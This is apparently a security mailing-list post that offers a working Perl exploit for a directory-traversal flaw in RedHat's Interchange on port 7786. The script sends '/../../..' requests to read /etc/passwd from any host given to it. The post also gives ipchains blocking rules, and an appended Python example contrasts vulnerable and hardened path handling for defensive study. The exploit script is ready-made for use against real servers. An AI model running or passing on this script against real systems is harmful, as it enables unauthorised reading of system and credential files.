First off, great site! I appreciate all the work you do. I just wanted to send in a quick and dirty perl script to retrieve any file from a server running RedHat's Interchange commerce system. The temp fix for this can be to use ipchains/iptables to block access to the port from outside the server.

/sbin/ipchains -A input -s 127.0.0.1 -d 127.0.0.1 7786 -p tcp -y -j ACCEPT
/sbin/ipchains -A input -s 0/0 -d 0/0 7786 -p tcp -y -j DENY

RedHat knows about it and I haven't checked my bugtraq/vuln-dev/fulldisclosure addys in a few days, so not sure if this is even public or not.. I did not discover it, I have however been using the below script as a way to test if the servers are vulnerable without having to telnet to each one. There is another version (final version actually) that reads the 'targets' from a file, but that's just not really needed. Anyone who needs that can add it in themselves..

#!/usr/bin/perl
#
# decker@n3t.net
# http://n3t.net
#
# grabs the file $thashit from the remote server
# using a gaping hole in RH's Interchange
#
################
use Socket;

$host=$ARGV[0];
$port = 7786;
$thashit= "/etc/passwd";
$time = localtime(time);
print "Trying to get $thashit from $host\n";
$tcpval = getprotobyname('tcp');
$serverIP = inet_aton($host);
$serverAddr = sockaddr_in(80, $serverIP);
$protocol_name = "tcp";
$iaddr = inet_aton($host) || die print("Failed to find host: $host");
$paddr = sockaddr_in($port, $iaddr) || die print("Something went wrong ... dieing...");
$proto = getprotobyname('tcp') || die print("Unable to get protocol");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("Failed to open socket: $!");
connect(SOCK, $paddr) || die print("Unable to connect: $!");
$submit = "GET /../../../../../../..$thashit\n\n";
send(SOCK,$submit,0);
# read the whole response from the socket, one line per list element
@thedata=<SOCK>;
#recv(SOCK, $thedata, 10000, undef);
close (SOCK);
foreach $lin(@thedata) {
    print "$lin";
}
print "\nEOF\n\n";
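The request the script sends works because the path in the GET line climbs out of the directory the server is meant to serve from. The following is an added example, not part of the original post and not Interchange's code: a generic request-path check showing the unchecked join beside a hardened one. The document root and all function names are assumptions, and the sample request is constructed from the string in the script.

```python
import posixpath

# Hypothetical document root; the post does not say where Interchange serves from.
DOCROOT = "/srv/catalog/pages"

# Constructed sample: the request line the script above builds for /etc/passwd.
SAMPLE_REQUEST = "GET /../../../../../../.." + "/etc/passwd" + "\n\n"


def parse_target(request_line):
    """Return the path from a bare 'GET <path>' request line, or None."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return None
    return parts[1]


def naive_resolve(docroot, target):
    """Vulnerable pattern: the request path is appended to the root unchecked.

    normpath is applied only to show which file the OS would end up opening.
    """
    return posixpath.normpath(docroot + target)


def safe_resolve(docroot, target):
    """Hardened pattern: normalise, then require the result to stay under docroot.

    Returns the resolved path, or None when the request must be refused.
    The check is lexical; on a real filesystem also resolve symlinks
    (os.path.realpath) before comparing.
    """
    if target is None or "\x00" in target or not target.startswith("/"):
        return None
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, target.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    target = parse_target(SAMPLE_REQUEST)
    print("naive:", naive_resolve(DOCROOT, target))
    print("safe :", safe_resolve(DOCROOT, target))
```

The ipchains rules in the post only limit who can reach port 7786; a check of this kind in the request handler is what removes the traversal itself.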